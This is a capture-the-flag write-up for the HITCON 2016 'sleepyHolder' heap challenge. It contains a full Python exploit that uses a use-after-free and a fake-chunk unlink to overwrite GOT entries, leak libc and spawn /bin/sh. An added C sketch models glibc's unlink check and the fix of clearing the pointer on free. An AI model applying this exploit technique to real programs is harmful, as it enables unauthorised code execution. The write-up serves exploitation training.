sleepyHolder_hitcon_2016
Summary
A UAF bug, followed by a conventional unlink. Along the way it requires understanding malloc_consolidate, i.e. how to set up the conditions for unlink.
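Exploitation steps
- Allocate the small chunk
- Allocate the big chunk
- Free the small chunk
- Allocate the huge chunk; this triggers malloc_consolidate, which turns the freed small chunk into a small bin chunk
- Free the small chunk again to create the overlap
- Allocate the small chunk and lay out the data for unlink
- Free the big chunk, triggering unlink
- Overwrite free@got with puts@plt to leak an address
- Overwrite free@got with system to get a shell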
Exp
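from pwncli import *

cli_script()

p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']

# Menu option 1: keep a secret of the given type (1 = small, 2 = big, 3 = huge)
def keep(size_type:int, data:(str, bytes)):
    p.sendlineafter("3. Renew secret\n", "1")
    p.sendlineafter("2. Big secret\n", str(size_type))
    p.sendafter("Tell me your secret: \n", data)

# Menu option 2: free the secret of the given type
def swip(size_type:int):
    p.sendlineafter("3. Renew secret\n", "2")
    p.sendlineafter("2. Big secret\n", str(size_type))

# Menu option 3: rewrite the secret of the given type
def renew(size_type:int, data:(str, bytes)):
    p.sendlineafter("3. Renew secret\n", "3")
    p.sendlineafter("2. Big secret\n", str(size_type))
    p.sendafter("Tell me your secret: \n", data)

def get_small(data="deadbeef\n"): keep(1, data)
def get_big(data="deadbeef\n"): keep(2, data)
def get_huge(data="deadbeef\n"): keep(3, data)

def free_small(): swip(1)
def free_big(): swip(2)

def write_small(data): renew(1, data)
def write_big(data): renew(2, data)

get_small()
get_big()
free_small()
get_huge()    # triggers malloc_consolidate
free_small()  # free the small chunk a second time (UAF) to overlap

# Fake chunk inside the small buffer: prev_size 0, size 0x21,
# fd = ptr - 0x18, bk = ptr - 0x10, followed by 0x20
layout = [0, 0x21,
          0x6020d0-0x18, 0x6020d0 - 0x10, 0x20]
get_small(flat(layout))
free_big()    # triggers unlink on the fake chunk

# The small pointer now points 0x18 below itself: set the pointer 0x10 below it
# to puts@got and the small pointer to free@got; (1 << 32) + 1 sets the two
# 32-bit words after the small pointer to 1
write_small(flat(0, elf.got['puts'], 0, elf.got['free'], (1 << 32) + 1))
write_small(p64(elf.plt['puts']))  # free@got = puts@plt
free_big()                         # now calls puts on puts@got, leaking its address
libc_base_addr = u64(p.recvn(6) + b"\x00\x00") - libc.sym['puts']
log_address("libc_base_addr", libc_base_addr)

write_small(p64(libc.sym['system'] + libc_base_addr))  # free@got = system
get_big("/bin/sh\x00")
free_big()                         # free(big) now runs system("/bin/sh")
p.interactive()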
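Why the `layout` in the exploit above gets past the pointer check in glibc's unlink, as an added example that is not part of the original write-up. It models memory as two small word arrays and implements only the `FD->bk == P && BK->fd == P` check (none of glibc's size checks); `0x6020d0` comes from the page, while `BSS_BASE`, `HEAP_BASE`, `word`, `checked_unlink` and `run` are names and values constructed for this sketch.

```c
#include <stdint.h>
#include <stdio.h>

#define SLOT      0x6020d0ULL  /* address used in the page's layout */
#define BSS_BASE  0x6020b0ULL  /* constructed: start of the modelled .bss window */
#define HEAP_BASE 0x1000000ULL /* constructed: address of the small buffer */

static uint64_t bss[8], heap[8]; /* two small simulated regions of 64-bit words */

/* Map a simulated address to its word in one of the two regions. */
static uint64_t *word(uint64_t addr) {
    if (addr >= HEAP_BASE) return &heap[(addr - HEAP_BASE) / 8];
    return &bss[(addr - BSS_BASE) / 8];
}

/* Pointer check from glibc's unlink: P->fd->bk and P->bk->fd must equal P. */
static int checked_unlink(uint64_t p) {
    uint64_t fd = *word(p + 0x10), bk = *word(p + 0x18);
    if (*word(fd + 0x18) != p || *word(bk + 0x10) != p)
        return -1;             /* glibc aborts: corrupted double-linked list */
    *word(fd + 0x18) = bk;     /* FD->bk = BK */
    *word(bk + 0x10) = fd;     /* BK->fd = FD */
    return 0;
}

/* Place the page's fake chunk at the buffer start and unlink it.
   Returns the slot's final value, or 0 if the check rejected the chunk. */
static uint64_t run(uint64_t slot_value) {
    for (int i = 0; i < 8; i++) bss[i] = heap[i] = 0;
    *word(SLOT) = slot_value;               /* what the global pointer holds */
    *word(HEAP_BASE + 0x00) = 0;            /* prev_size */
    *word(HEAP_BASE + 0x08) = 0x21;         /* size */
    *word(HEAP_BASE + 0x10) = SLOT - 0x18;  /* fd */
    *word(HEAP_BASE + 0x18) = SLOT - 0x10;  /* bk */
    if (checked_unlink(HEAP_BASE) != 0) return 0;
    return *word(SLOT);
}

int main(void) {
    printf("stale pointer kept: slot = %#llx\n", (unsigned long long)run(HEAP_BASE));
    printf("pointer cleared on free: slot = %#llx\n", (unsigned long long)run(0));
    return 0;
}
```

The second call shows the same fake chunk being rejected once the global pointer no longer holds the buffer address, which is what clearing the pointer on free (the usual remediation for a dangling pointer) achieves.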
This article is from cnblogs (博客园). Author: LynneHuan. When reposting, please cite the original link: https://www.cnblogs.com/LynneHuan/p/15229806.html
